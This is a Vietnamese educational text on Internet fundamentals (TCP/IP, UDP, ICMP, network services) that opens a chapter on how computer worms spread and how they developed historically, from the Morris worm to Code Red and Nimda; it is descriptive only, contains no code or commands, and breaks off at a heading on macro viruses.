TỔNG QUAN VỀ INTERNET
Giới thiệu về Internet
Internet là một mạng lưới máy tính toàn cầu, kết nối hàng triệu thiết bị trên khắp thế giới.
Internet có nguồn gốc từ mạng ARPANET, được xây dựng bởi Cục các dự án nghiên cứu tiên tiến (ARPA) vào tháng 6/1968 nhằm kết nối các trung tâm máy tính lớn Đến mùa thu năm 1969, bốn trạm đầu tiên đã được kết nối thành công, đánh dấu sự ra đời của ARPANET với giao thức truyền thông ban đầu là Network Control Protocol (NCP) Nhận thấy nhu cầu thực tế, các nhà thiết kế đã hướng tới việc xây dựng một "mạng của các mạng máy tính" Giữa những năm 70, bộ giao thức TCP/IP do Vint Cerf và Robert Kahn phát triển đã thay thế hoàn toàn NCP trong ARPANET vào năm 1983.
Vào năm 1984, Bộ Quốc phòng Mỹ đã chia ARPANET thành hai phần: ARPANET dành cho nghiên cứu khoa học và Milinet phục vụ quân đội Một bước ngoặt quan trọng trong lịch sử Internet diễn ra khi Ủy ban Khoa học Quốc gia Mỹ (NSF) tài trợ cho 5 trung tâm siêu máy tính và kết nối chúng thành một mạng xương sống Năm 1987, mạng NSFnet ra đời với tốc độ truyền tải nhanh hơn, cho phép kết nối 7 mạng mới với các trung tâm siêu máy tính này, đánh dấu sự xuất hiện của mạng xương sống.
NFSnet và các mạng vùng đã đóng vai trò quan trọng trong việc thúc đẩy sự phát triển của Internet Sự hình thành của một xa lộ thông tin đã thu hút sự tham gia của nhiều trường đại học, viện nghiên cứu, tổ chức chính phủ và doanh nghiệp trong cộng đồng Internet Về mặt địa lý, Internet nhanh chóng mở rộng ra ngoài biên giới nước Mỹ, trở thành một mạng lưới toàn cầu phục vụ hàng triệu người dùng trên khắp thế giới.
Mặc dù không có cơ quan quản lý tối cao cho toàn bộ Internet, Hiệp hội Internet (ISOC) đóng vai trò quan trọng trong việc điều phối các hoạt động của mạng toàn cầu Là tổ chức phi lợi nhuận, ISOC tập hợp cá nhân và tổ chức nhằm khuyến khích phát triển và sử dụng Internet trên toàn thế giới Ban kiến trúc Internet (IAB) là cơ quan lãnh đạo cao nhất của ISOC, thường xuyên xem xét các chuẩn và quy định liên quan đến tài nguyên Internet Một tổ chức tự nguyện trong khuôn khổ IAB, Tiểu ban kỹ thuật Internet (IETF), chịu trách nhiệm về các vấn đề kỹ thuật và tác nghiệp của Internet, đồng thời lập nhóm làm việc khi có vấn đề quan trọng Mọi người đều có thể tham gia các cuộc họp và nhóm làm việc của IETF.
Việc phân phối địa chỉ cho các máy tính kết nối Internet ban đầu do ISOC đảm nhiệm, nhưng từ năm 1992, do sự phát triển nhanh chóng của Internet, công việc này được chuyển giao cho các trung tâm thông tin mạng (NIC) khu vực APNIC, NIC khu vực Châu Á Thái Bình Dương, có trụ sở tại Tokyo, Nhật Bản ISOC đã khuyến khích việc phân cấp NIC cho từng quốc gia, và hiện nay, Việt Nam đã thành lập VNNIC để quản lý và phân phối địa chỉ cho các máy tính trong nước.
1.1.3 Các dịch vụ mức ứng dụng ban đầu trên Internet
Thư điện tử (E-mail) cho phép người dùng gửi thông điệp từ máy tính cá nhân đến bất kỳ ai trên toàn cầu, miễn là có địa chỉ E-mail Người dùng cũng có thể tham gia vào các nhóm thảo luận về nhiều chủ đề khác nhau hoặc khởi tạo nhóm mới theo sở thích cá nhân.
Truyền file (File Transfer) cho phép người dùng tải xuống các chương trình phần mềm mới như tiện ích nén file, phần mềm diệt virus, trò chơi, hình ảnh hoặc âm thanh bất cứ lúc nào.
Truy cập từ xa là một trong những ứng dụng thú vị nhất của Internet, cho phép người dùng kết nối với máy tính ở xa như một trạm cuối để sử dụng tài nguyên và chức năng của máy tính đó.
Ngày nay, nhiều dịch vụ Internet đã được phát triển và ứng dụng Đó là :
Thư điện tử W.W.W (world – wide – web) FIP (File Transfer Protocol) Telnet
1.1.4 Dịch vụ mức mạng của Internet
Một lập trình viên phát triển ứng dụng trên Internet cần có cái nhìn sâu sắc hơn so với người dùng thông thường Tầng mạng Internet cung cấp hai loại dịch vụ chính mà các ứng dụng thường sử dụng.
Dịch vụ truyền không kết nối (Connectionless Packet Delivery Service) là phương thức truyền dữ liệu do các mạng chuyển mạch gói cung cấp, trong đó các gói tin được chuyển từ máy này sang máy khác dựa trên thông tin địa chỉ của gói Lợi ích của việc chia nhỏ gói tin là nếu một đường truyền bị bận hoặc đứt, các gói tin có thể được chuyển theo hướng khác, đảm bảo tính linh hoạt và hiệu quả trong việc truyền tải dữ liệu.
Dịch vụ truyền tin cậy (Reliable Stream Transport Service) là giải pháp cho các ứng dụng cần nhiều hơn chỉ là truyền thông không kết nối, vì chúng yêu cầu tính năng tự động sửa lỗi và kiểm tra tính toàn vẹn của thông tin trên mạng Dịch vụ này đảm bảo rằng dữ liệu được truyền đi một cách chính xác và an toàn.
Bộ giao thức TCP/IP
Để các máy tính trên Internet có thể giao tiếp, cần có sự thống nhất về các quy tắc và quy ước gọi là giao thức Bộ giao thức chính của Internet là TCP/IP, bao gồm nhiều giao thức phối hợp để cung cấp phương tiện truyền thông trên mạng Hai giao thức quan trọng nhất trong bộ này là TCP (Transmission Control Protocol) và IP (Internet Protocol), đóng vai trò then chốt trong việc quản lý và truyền tải dữ liệu.
Bộ giao thức TCP/IP cho phép các máy tính từ nhiều hãng sản xuất và hệ điều hành khác nhau giao tiếp hiệu quả, vượt xa những dự đoán ban đầu Bắt đầu từ cuối những năm 1960 như một dự án nghiên cứu về mạng chuyển mạch gói, đến những năm 1990, TCP/IP đã trở thành giao thức phổ biến nhất cho kết nối mạng máy tính Hệ thống này mở và công khai, cung cấp định nghĩa và cài đặt cho người dùng TCP/IP chính là nền tảng cho Internet, một mạng diện rộng (WAN) kết nối hàng triệu máy tính trên toàn cầu.
Các giao thức mạng được thiết kế theo mô hình tầng, với mỗi tầng đảm nhiệm một khía cạnh riêng của truyền thông Một bộ giao thức như TCP/IP là sự kết hợp của nhiều giao thức thuộc các tầng chức năng khác nhau TCP/IP thường được phân loại thành 4 tầng, như mô tả trong hình 1.1.
Chức năng của các lớp của bộ giao thức TCP/IP:
1 Lớp Link, đôi khi còn được gọi là lớp data _ link hoặc network interface, thường bao gồm trình điều khiển thiết bị trong hệ điều hành và card giao tiếp mạng tương ứng trong máy tính Chúng cùng nhau xử lý tất cả các chi tiết phần cứng của các giao tiếp vật lý với cable ( hoặc bất cứ kiểu phương tiện trung gian nào khác được sử dụng)
Application Telnet, FTP, e – mail, etc
Link Device driver and interface card
Hình 1.1: Bốn lớp của bộ giao thức TCP/IP
2 Lớp Network (đôi khi còn gọi là lớp liên mạng – internet) xử lý việc vận chuyển các gói tin qua mạng Ví dụ như dẫn đường cho các gói tin chẳng hạn IP (Internet Protocol), ICMP (Internet Control Message Protocol) và IGMP (Internet Group Management Protocol) cung cấp lớp mạng trong bộ giao thức TCP/IP
3 Lớp Transport cung cấp dòng dữ liệu giữa hai host cho lớp ứng dụng bên trên Trong bộ giao thức TCP/IP có hai giao thức Transport khác biệt nhau: TCP và UDP
1 TCP cung cấp dòng dữ liệu tin cậy giữa hai host Nó nhận dữ liệu đến từ các ứng dụng và chia thành các khúc (chunk) có kích thước thích hợp cho lớp network bên dưới, báo nhận các gói tin nhận được, thiết lập timeout để chắc chắn rằng một đầu cuối khác báo nhận các gói tin đã được gửi rồi, … Bởi vì lớp transport cung cấp dữ liệu tin cậy nên lớp ứng dụng có thể bỏ qua, không để ý đến những chi tiết này
2 UDP lại khác hẳn, cung cấp cho lớp ứng dụng các dịch vụ đơn giản hơn nhiều Nó chỉ gửi các gói dữ liệu gọi là datagram từ host này tới host khác, mà không đảm bảo rằng các gói tin đó sẽ đến được đích Các chức năng đảm bảo tin cậy chỉ có thể được thêm vào ở lớp ứng dụng
Do đó, mỗi loại giao thức này được sử dụng bởi các ứng dụng khác nhau
4 Lớp Application xử lý các chi tiết của một ứng dụng đặc trưng Có nhiều ứng dụng TCP/IP thông dụng mà hầu hết các cài đặt cung cấp:
- Telnet cho đăng nhập từ xa
- FTP (File Transfer Protocol) giao thức truyền tệp
- SMTP (Simple Mail Transfer Protocol) cho thư điện tử
- SNMP (Simple Network Mannagement Protocol) và rất nhiều các ứng dụng khác nữa
Chúng ta có thể so sánh kiến trúc 4 tầng của TCP/IP với kiến trúc 7 tầng của mô hình tham chiếu OSI ( Open System Interconnection)
Presentation Layer Session Layer Transport Layer Transport Layer
Data link Layer Link Layer
Nếu có hai host trong một mạng cục bộ (Local Area Network – LAN), như một Ethernet chẳng hạn, cùng chạy FTP, hình 1.2 chỉ ra các giao thức liên quan:
Các tiến Xử lý các
FTP protocol trình người chi tiết
FTP server dùng ứng dụng Transport
Hình 1.2: Hai host trên một LAN cùng chạy FTP
Trong mạng máy tính, các ứng dụng thường được phân loại thành hai loại chính: FTP client và FTP server FTP server cung cấp dịch vụ truy cập tệp cho các client, cho phép người dùng tải lên và tải xuống dữ liệu từ máy chủ Tương tự, trong ứng dụng đăng nhập từ xa như Telnet, dịch vụ mà server cung cấp là khả năng truy cập vào các host từ phía client.
Mỗi lớp trong mô hình mạng có một hoặc nhiều giao thức để giao tiếp với lớp ngang hàng Ví dụ, một giao thức cho phép hai lớp TCP tương tác, trong khi một giao thức khác cho phép hai lớp IP kết nối với nhau.
Trong hình 1.2, lớp ứng dụng thường là tiến trình của người dùng, trong khi ba lớp thấp hơn thường được cài đặt trong nhân (kernel) của hệ điều hành Mặc dù không phải là yêu cầu bắt buộc, cấu trúc này mang tính điển hình và được thể hiện rõ trong hệ điều hành Unix.
Lớp ứng dụng trong mô hình mạng tập trung vào các chi tiết liên quan đến ứng dụng mà không quan tâm đến việc truyền dữ liệu qua mạng Ngược lại, ba lớp bên dưới không biết gì về ứng dụng nhưng đảm nhận toàn bộ các khía cạnh của việc truyền thông.
Trong hình 1.2, bốn giao thức được thể hiện ở bốn tầng khác nhau: FTP thuộc tầng ứng dụng, TCP thuộc tầng vận chuyển, IP thuộc tầng mạng, và Ethernet hoạt động ở tầng liên kết Bộ giao thức TCP/IP bao gồm cả TCP và các giao thức khác.
IP chỉ là một trong nhiều giao thức trong bộ giao thức mạng Hình dưới đây minh họa rõ ràng các giao thức khác nhau, bao gồm cả IP, thể hiện sự đa dạng và chức năng của chúng trong hệ thống mạng.
FTP (File Transfer Protocol): Giao thức truyền tệp cho phép người dùng lấy hoặc gửi tệp tới một máy khác
Telnet là một giao thức đăng nhập từ xa, cho phép người dùng kết nối và làm việc với hệ thống ở xa như thể họ đang sử dụng một trạm cuối trực tiếp Người dùng có thể đăng nhập vào một máy tính từ trạm làm việc của mình qua mạng, tạo ra sự linh hoạt trong việc truy cập và quản lý hệ thống.
SMTP (Simple Mail Transfer Protocol): Giao thức thư tín điện tử
DNS (Domain Name Server): Dịch vụ tên miền cho phép nhận ra máy tính từ một tên miền thay cho chuỗi địa chỉ Internet khó nhớ
SNMP (Simple Network Management Protocol): Giao thức quản trị mạng cung cấp những công cụ quản trị mạng
RIP (Routing Internet Protocol): Giao thức dẫn đường động
ICMP (Internet Control Message Protocol): Giao thức điều khiển thông báo
UDP ( User Datagram Protocol): Giao thức truyền thông không kết nối cung cấp dịch vụ truyền không tin cậy nhưng tiết kiệm cho phí truyền
TCP (Transmission Control Protocol): Giao thức có kết nối cung cấp dịch vụ truyền thông tin cậy
IP (Internet Protocol): Giao thức Internet chuyển giao các gói tin qua mạng tới đích
ARP (Address Resolution Protocol): Giao thức chuyển địa chỉ TCP/IP thành địa chỉ vật lý của các thiết bị mạng
Kiến trúc của TCP/IP
Giao thức không kết nối
Giao thức UDP cho phép ứng dụng truy cập trực tiếp vào gói tin của dịch vụ chuyển giao, tương tự như dịch vụ mà giao thức IP cung cấp Nó hỗ trợ việc trao đổi thông tin qua mạng với lượng thông tin điều khiển tối thiểu Tuy nhiên, UDP là giao thức không kết nối và kém tin cậy do không có cơ chế kiểm tra tính đúng đắn của dữ liệu truyền.
Mỗi gói thông tin UDP, được gọi là Datagram, bao gồm hai phần chính: header và data Trong phần header, có chứa thông tin quan trọng như địa chỉ cổng nguồn, địa chỉ cổng đích, độ dài của gói và checksum.
1.3.2 Phân kênh và hợp kênh
Phân kênh và hợp kênh là quá trình lựa chọn các ứng dụng trong số lượng lớn tiến trình sử dụng giao thức UDP, nhằm xác định những ứng dụng phù hợp với các gói thông tin được truyền đi.
Cơ chế cổng (Port mechanism) giải quyết vấn đề bằng cách gán mỗi ứng dụng với một số hiệu cổng (Port number), trong đó mỗi gói thông tin được gửi đi đều chứa trường SOURCE PORT.
Tại nơi nhận, dựa vào thông tin trong trường DESTINATION PORT mà gói tin đó được truyền đến cổng tương ứng với ứng dụng Ví dụ mọi bản
UDP: Demultiplexing Based on Port
IP Layer UDP Datagram arrives
TCP/IP đều có dịch vụ FTP (File Transfer Protocol) gắn với cổng 21 và TFTP (Trivial File Transfer Protocol) gắn với cổng 69 của UDP
Việc sử dụng các port number cũng có nhiều cách
Dùng những cổng dành riêng cho từng ứng dụng đã được đăng ký trước (Well – known port assigment)
Một port number sẽ được sinh ra khi có một ứng dụng đòi hỏi (Dynamic binding)
Cách tiếp cận kết hợp (Hybrid) sử dụng các quy tắc phân bổ cổng nổi tiếng cho một số số cổng, đồng thời cho phép định nghĩa các số cổng khác khi cần thiết Các số cổng phổ biến của UDP thường nằm trong khoảng từ 1 đến 255 Một số hệ điều hành như 4.3 BSD UNIX còn dành chỗ cho các số cổng đến 1023, trong khi các số cổng có thể sử dụng được bắt đầu từ 1024 trở lên.
Một số cổng UDP dành riêng
15 Who is up or NETSTAT
69 Trivial File Tranfer Protocol ( TFTP)
Có một số lý do để người lập trình ứng dụng lựa chọn UDP như một dịch vụ giao vận:
Khi có nhiều gói tin nhỏ được truyền, thông tin cần thiết cho việc kết nối và sửa lỗi có thể vượt quá đáng kể so với thông tin thực sự cần truyền Trong tình huống này, giao thức UDP trở thành giải pháp hiệu quả nhất.
Các ứng dụng kiểu “Query - Response” rất phù hợp với giao thức UDP, cho phép câu trả lời được sử dụng như một xác nhận cho câu hỏi đã gửi Nếu không nhận được phản hồi trong một khoảng thời gian nhất định, ứng dụng có thể dễ dàng gửi một câu hỏi khác.
Một số ứng dụng đã tự nó cung cấp công nghệ riêng để chuyển giao thông tin tin cậy, và không đòi hỏi dịch vụ này của transport layer
Giao thức điều khiển truyền tin
Giao thức điều khiển truyền tin (ICMP), được định nghĩa trong RFC 792, sử dụng gói tin IP để truyền thông báo ICMP thực hiện các chức năng như điều khiển, thông báo lỗi và cung cấp thông tin cho TCP/IP Thông thường, ICMP được gửi khi một gói tin không thể đến đích, khi một gateway không còn đủ bộ nhớ để nhận thêm gói tin, hoặc khi một gateway hướng dẫn máy tính sử dụng gateway khác để truyền thông tin theo con đường tối ưu hơn.
Mặc dầu mỗi thông báo ICMP có môt kiểu định dạng riêng của nó, song các thông báo đều chưa 3 trường đầu tiên giống nhau:
TYTE: Định nghĩa thông báo đi sau
CODE: Cung cấp thông tin thêm về thông báo
CHECKSUM: Chứa checksum của thông báo
Type Field ICMP Message Type
1.4.1 Điều khiển dòng dữ liệu
Khi trạm nguồn gửi dữ liệu quá nhanh, trạm đích không kịp xử lý thông tin Để giải quyết vấn đề này, trạm đích hoặc thiết bị dẫn đường sẽ gửi thông báo yêu cầu trạm nguồn tạm ngừng việc truyền tải dữ liệu.
Khi không thể xác định trạm đích, gateway sẽ gửi thông báo lỗi "Destination Unreachable" về trạm nguồn Nếu có sự không tương thích với số hiệu cổng, trạm đích sẽ phản hồi lại bằng cách gửi thông báo lỗi cho trạm nguồn, với thông tin về cổng sẽ được trình bày trong phần giao thức tầng giao vận.
Một gateway có thể gửi thông báo định hướng lại cho trạm gửi, yêu cầu sử dụng một gateway khác khi gateway đó phù hợp hơn Tình huống này chỉ xảy ra khi trạm gửi kết nối vào mạng có hơn 2 gateway.
Khi máy tính B gửi thông tin đến máy C, nếu thông báo đến gateway 1, nó sẽ được chuyển hướng qua gateway 2 Tuy nhiên, khi các máy tính trên mạng X.25 muốn gửi thông báo đến máy tính trên mạng Token Ring, việc chuyển hướng không cần thiết vì gateway 1 đã được kết nối trực tiếp với mạng Token Ring.
1.4.4 Kiểm tra trạm làm việc
Khi một máy tính cần kiểm tra sự tồn tại và hoạt động của một máy tính khác, nó sẽ gửi một thông báo Echo Request Máy trạm đích nhận thông báo này và phản hồi bằng một Echo Reply Lệnh ping trong hệ điều hành UNIX sử dụng các thông báo này để thực hiện kiểm tra kết nối mạng.
Các dịch vụ mạng
Dịch vụ WEB, hay còn gọi là WWW, sử dụng ngôn ngữ đánh dấu siêu văn bản HTML để tạo ra các trang thông tin đa phương tiện, bao gồm văn bản, hình ảnh, âm thanh và dữ liệu Dịch vụ này hoạt động theo mô hình Client/Server, cho phép người dùng truy cập và tương tác với nội dung trực tuyến một cách dễ dàng.
Dịch vụ truyền file (FTP) là một trong những phương thức phổ biến để chuyển tải file giữa các máy chủ và máy khách trên mạng Các loại file có thể bao gồm văn bản, hình ảnh, video, thư viện, và đặc biệt là phần mềm ứng dụng miễn phí hoặc thử nghiệm Giao thức FTP cho phép truyền file mà không bị ảnh hưởng bởi vị trí địa lý hay hệ điều hành của các máy.
1.5.3.Dịch vụ truy nhập từ xa(Telnet)
Telnet là một công cụ cho phép người dùng đăng nhập vào một máy tính từ xa, hoạt động như một đầu cuối kết nối trực tiếp với máy chủ đó.
1.5.4 Dịch vụ tra cứu theo chỉ mục
Dịch vụ tra cứu theo chỉ mục Gopher cung cấp thông tin theo chủ đề thông qua các thực đơn, cho phép người dùng dễ dàng tìm kiếm tài liệu Máy chủ Gopher không chỉ lưu trữ tài liệu mà còn chứa các chỉ dẫn kết nối đến các Gopher khác Người dùng có thể sử dụng các client của Gopher để nhận file văn bản, hình ảnh, đồ họa và âm thanh.
Dịch vụ nhóm tin (Usenet) là mạng nhóm tin lớn nhất thế giới, kết nối hàng ngàn máy chủ tin (New Host) để truyền đạt thông tin Đây là môi trường tranh luận đa dạng, cho phép người dùng trao đổi ý kiến về các chủ đề quan tâm Khác với danh sách thư điện tử, nơi thư được gửi riêng lẻ cho từng thành viên, Usenet cho phép người dùng đăng tải câu hỏi, ý kiến, thông báo hoặc tài liệu lên một máy chủ chung.
1.5.6 Dịch vụ tìm kiếm thông tin diện rộng
Dịch vụ WAIS (Wide Area Information Service) là một công cụ tìm kiếm thông tin trên mạng, cho phép người dùng tìm kiếm các tệp dữ liệu thông qua chuỗi đề mục lừa chọn WAIS giúp người dùng nhanh chóng tìm ra các tệp chứa xâu ký tự xác định trước.
1.5.7 Dịch vụ tìm kiếm tên tệp
Dịch vụ tìm kiếm tên tệp Archie là một hệ thống máy chủ lưu trữ địa chỉ của nhiều máy FTP server vô danh Các máy FTP này chứa thông tin về các file trên các máy chủ công cộng và được cập nhật liên tục Archie Server sử dụng giao thức FTP để tải xuống danh sách các file từ các host công cộng và cập nhật cơ sở dữ liệu của mình.
Người dùng có thể truy cập Archie server bằng cách kết nối trực tiếp qua Telnet và sử dụng các lệnh của Archie Ngoài ra, người dùng cũng có thể kết nối gián tiếp qua email, gửi các lệnh cần thiết và nhận lại kết quả từ Archie qua thư điện tử.
Dịch vụ IRC (Internet Relay Chat) là một phương tiện giao tiếp "thời gian thực" qua mạng, cho phép người dùng trao đổi thông tin một cách cá nhân mà không bị người khác khám phá Người dùng có thể tạo "kênh mở" để nhiều người cùng tham gia thảo luận Ngoài việc trao đổi bằng lời nói, IRC còn hỗ trợ gửi file như hình ảnh, chương trình, tài liệu và nhiều loại tệp khác.
1.5.9 Dịch vụ thư điện tử
Dịch vụ thư điện tử (Email) là dịch vụ quan trọng và phổ biến nhất trên
Internet nổi bật nhờ tính tiện dụng của nó, với thư điện tử là một trong những dịch vụ phổ biến nhất trước khi World Wide Web ra đời Thư điện tử không phải là dịch vụ “đầu – cuối” mà là dịch vụ “lưu và chuyển tiếp”, cho phép việc chuyển thư từ máy này sang máy khác cho tới máy đích mà không cần liên kết trực tiếp Đây là dịch vụ cơ bản mà hầu hết các mạng diện rộng cài đặt và nhiều người sử dụng máy tính chỉ tham gia mạng để sử dụng dịch vụ này Giao thức SMTP (Simple Mail Transfer Protocol) được sử dụng để thực hiện việc gửi thư.
Protocol) trong họ giao thức TCP/IP
Thư điện tử là một phương thức trao đổi thông tin nhanh chóng và thuận tiện, cho phép người dùng gửi và nhận các bản tin ngắn hoặc dài chỉ qua một kênh duy nhất Nhiều người ưa chuộng sử dụng thư điện tử thay vì các chương trình truyền tập tin thông thường Đặc điểm nổi bật của dịch vụ thư điện tử là tính không tức thời (off-line), nghĩa là các yêu cầu gửi đi không cần phải được xử lý ngay lập tức.
Khi người dùng gửi thư, hệ thống chuyển thư vào vùng spool cùng với thông tin người gửi, người nhận và địa chỉ máy nhận Một chương trình chạy nền sẽ xác định địa chỉ IP của máy nhận và tạo liên kết để gửi thư Nếu kết nối thành công, thư sẽ được chuyển tới vùng spool của máy nhận Nếu không thể kết nối, chương trình sẽ ghi lại các thư chưa gửi và thử lại sau Nếu thư không được gửi sau một khoảng thời gian nhất định (ví dụ 3 ngày), hệ thống sẽ trả lại thư cho người gửi.
Mọi email trên Internet đều tuân theo một chuẩn nhất định, bao gồm phần header với địa chỉ người gửi và người nhận dưới dạng domain name, cùng với phần nội dung thư Cả hai phần này đều sử dụng ký tự ASCII chuẩn Thông tin trong phần header là yếu tố quyết định giúp thư được chuyển qua mạng và đến đúng đích.
Thư điện tử ban đầu chỉ phục vụ việc trao đổi thông báo giữa người sử dụng, nhưng đã được phát triển thành các dịch vụ thông tin đa dạng hơn Các dịch vụ này sử dụng thư với cú pháp đặc biệt để thể hiện yêu cầu của người dùng Những thư này được gửi đến các server, nơi chúng được phân tích và thực hiện yêu cầu, sau đó gửi kết quả trở lại người yêu cầu dưới dạng thư điện tử.
Có hai server phổ biến trong hoạt động này là
Name server cung cấp dịch vụ tra cứu địa chỉ trên mạng
Archive server cho phép người sử dụng tìm kiếm và lấy về những tệp tin dùng chung
Bài viết này đã trình bày những khái niệm cơ bản về Internet và các ứng dụng liên quan, nhằm cung cấp kiến thức nền tảng phục vụ cho các chương tiếp theo.
CHƯƠNG 2 : CÁCH THỨC HOẠT ĐỘNG CỦA SÂU
Tổng quan về sâu máy tính (worm)
2.1.1 Khái niệm sâu Để đơn giản ta nói là “sâu” mà không nói là sâu máy tính nhưng vẫn được hiểu là sâu máy tính
Sâu máy tính là một loại phần mềm độc hại (malware) có khả năng lây lan tự động từ máy tính này sang máy tính khác mà không cần sự can thiệp của con người Khác với virus, sâu chiếm quyền kiểm soát các tính năng trong máy tính để truyền tải tệp hoặc thông tin, dẫn đến việc tự động sao chép và gửi bản sao đến danh sách địa chỉ email của người dùng Điều này không chỉ làm tăng lưu lượng mạng mà còn gây tắc nghẽn, khiến cho việc truy cập Internet trở nên chậm chạp hơn Sự phát tán nhanh chóng của các sâu mới có thể ảnh hưởng nghiêm trọng đến hiệu suất mạng và trải nghiệm người dùng.
Sâu máy tính và các virus khác phát tán nhƣ thế nào?
Tất cả các virus và nhiều sâu gần như không thể phát tán trừ khi bạn mở hoặc chạy một chương trình bị nhiễm
Nhiều virus nguy hiểm lây lan qua các tệp đính kèm trong thư điện tử, mà bạn có thể nhận diện qua biểu tượng kẹp giấy và tên tệp Các loại tệp như ảnh, tài liệu Microsoft Word và bảng tính Excel thường được gửi qua email hàng ngày Virus sẽ được kích hoạt khi bạn mở tệp đính kèm, thường bằng cách nhấn đúp vào biểu tượng.
2.1.2 Sự phát triển của virus và worm
Virus và worm đã trải qua nhiều giai đoạn phát triển Hiện tại, một trong những đặc điểm nổi bật của worm là khả năng lây lan nhanh chóng và khả năng đánh cắp thông tin.
Các thế hệ phát triển của virus, worm :
Thế hệ thứ nhất của virus máy tính, từ năm 1979 đến đầu những năm 1990, chủ yếu bao gồm virus boot-sector nhắm vào hệ điều hành MSDOS và các sâu máy tính đầu tiên, thường tạo ra lỗi và điều khiển phần cứng đặc trưng Thuật ngữ "worm" được John Shoch và Joh Hupp giới thiệu tại Xerox PARC vào năm 1979, khi họ phát triển chương trình tự sao chép để lây lan sang các máy tính khác Ý tưởng này đã được John Von Neumann nêu ra từ năm 1949 Điểm khác biệt của Shoch và Hupp là khả năng lây nhiễm vào cả những máy tính nhàn rỗi Các worm thời kỳ này có thời gian sống giới hạn và có thể bị tiêu diệt bằng cách gửi một gói dữ liệu đặc biệt Tuy nhiên, một số chương trình worm vẫn có thể hoạt động ngoài tầm kiểm soát và gây thiệt hại cho các máy chủ chỉ trong một đêm.
Năm 1983, Fred Cohen đã phát triển ý tưởng về việc tạo ra chương trình virus máy tính đầu tiên khi còn là sinh viên tại USC Virus "Christmas Exec" là một trong những virus đầu tiên sử dụng email để lây lan, với chức năng đơn giản là hiển thị một thẻ chúc mừng Giáng sinh trên màn hình máy tính bằng ngôn ngữ Script REXX Virus này tự động gửi bản sao đến các địa chỉ trong hộp thư, khiến người nhận tin rằng đó là một món quà từ bạn bè và mở nó ra, từ đó virus tiếp tục lây lan qua email.
Vào ngày 2 tháng 10 năm 1988, một loại sâu máy tính nổi tiếng đã tê liệt 6000 máy tính chỉ trong vài giờ, do sinh viên Robert Morris phát triển Loại sâu này khai thác lỗ hổng của hệ điều hành UNIX trong chương trình gửi mail và sử dụng kỹ thuật tấn công tràn bộ đệm thông qua lỗi trong chương trình finger, một công cụ tìm hiểu thông tin người dùng trên mạng.
Thế hệ thứ hai (đầu những năm 1990 đến 1998) đánh dấu sự phát triển mạnh mẽ của virus so với worm máy tính Trong giai đoạn này, sự tiến bộ trong công nghệ máy tính đã ảnh hưởng đến việc phát triển các ý tưởng mới, đặc biệt là việc sử dụng các thuật toán mã hóa, dẫn đến sự xuất hiện của hình thái virus mới Hình thái virus này lần đầu tiên xuất hiện vào năm 1989 tại Châu Âu.
Virus tự nhân bản bằng cách chèn số ngẫu nhiên vào lượng bytes lớn trong thuật toán giải mã, trở thành thách thức từ năm 1992 với sự xuất hiện của nhiều loại virus như TPE và NED DAME Việc viết chương trình virus đã trở thành một trào lưu, hình thành các nhóm phát triển công cụ cho phép những người có kỹ năng lập trình cơ bản cũng có thể dễ dàng tạo ra virus Một ví dụ điển hình là virus Anna Kournikova, lây lan qua email với mã virus và hình ảnh tennis, sử dụng VBScript để tự sao chép vào tất cả các địa chỉ trong hộp thư Outlook.
Vào năm 1995, virus macro lần đầu tiên xuất hiện trên Word của hệ điều hành Windows 95, tự động lây nhiễm vào file "normal.dot" khi mở bất kỳ tài liệu Word nào Tuy nhiên, sau một thời gian, người dùng đã nhận thức được các biện pháp phòng ngừa, khiến cho virus macro trở nên khó phát triển hơn.
Thế hệ thứ ba: (tư 1999 đến 2000) : Những bức thư với số lượng lớn
Happy99 là một loại worm đã lây lan qua email vào tháng 1 năm 1999, với file đính kèm là Happy99.exe Khi kích hoạt, worm này hiển thị hình ảnh pháo hoa trên màn hình cùng dòng chữ “New Year’s Day 1999” Tuy nhiên, điểm nguy hiểm là nó đã bí mật thay đổi file WSOCK32.DLL, một file quan trọng cho việc kết nối Internet, bằng cách sử dụng một chương trình gọi là “con ngựa thành Trojan”, cho phép worm tự động tham gia vào quá trình truyền thông File WSOCK32.DLL gốc đã được đổi tên thành WSOCK32.SKA.
Tháng 3 năm 1999, virus macro Melissa đã phát tán rất nhanh lây nhiễm tới 100,000 máy tính trên toàn cầu trong vòng 3 ngày, nó cài đặt một bản ghi mới và tắt thư điện tử của nhiều công ty dùng Microsoft Exchange Server Nó bắt đầu gửi đến một nhóm mới trên mạng đến trang “alt.sex” với tài khoản và password đầy hứa hẹn Các tài liệu bị tấn công chứa các đoạn mã macro dùng các hàm của Word và outlook e-mail để nhân bản worm Tiếp theo virus tìm kiếm khóa Registry hiện thời chứa xâu “kwyjibo” Trong trường hợp không có khóa này thì nó sẽ tự gửi đi 50 bản với địa chỉ cần gửi được lấy trong hộp địa chỉ Outlook Hơn nữa nó còn lây nhiễm vào file normal.dot dùng macro VBA Như vậy là bất kỳ một tài liệu nào khi lưu lại sẽ chứa virus
Vào tháng 5 năm 2000, sâu máy tính LoveLetter đã gây ra một sự lây lan rộng rãi, trở thành hình mẫu cho các loại worm e-mail sau này Nó gửi đi một thông điệp với tiêu đề "I love you", khiến người nhận bị thu hút và mở phần đính kèm Phần đính kèm này chứa mã VB Script, có khả năng tự động chạy trên Windows Script Host, một thành phần của hệ điều hành Windows 98.
Vào năm 2000, một loại worm đã xuất hiện, tự sao chép vào thư mục hệ thống và thay đổi registry để tạo ra file thực thi tự động khi khởi động máy tính Worm này lây nhiễm vào nhiều loại file khác nhau và nếu Outlook được cài đặt, nó sẽ tự động gửi một email đến tất cả các địa chỉ trong hộp thư Ngoài ra, worm còn tạo ra các kênh nối IRC, đánh cắp mật khẩu và thay đổi URL trên Internet Explorer đến một trang web ở Châu Á Trang web này cố gắng tải xuống một Trojan được thiết kế để thu thập mật khẩu từ email của người dùng khác.
Thế hệ thứ tƣ: (từ 2001 đến nay)
Thế hệ sâu máy tính hiện đại, như Code Red và Nimda, đã thể hiện sự lây lan khủng khiếp, đánh dấu một hình thái mới vượt trội hơn so với sâu truyền thống nhờ vào những đặc tính nâng cao.
Tấn công theo kiểu hỗn hợp
Tìm cách lây vào các môi trường mới (Linux, mạng ngang hàng )
Tự cập nhật mã một cách tự động từ Internet
Các đoạn mã nhỏ nguy hiểm
Chống lại các phần mềm chống virus
Worm hiện đại đã tiến hóa mạnh mẽ, từ các kỹ thuật cơ bản đến sự phát triển của các phương thức tấn công và lỗ hổng trong phần mềm, hệ điều hành, tạo ra những con sâu máy tính có khả năng gây hại lớn.
Macro virus
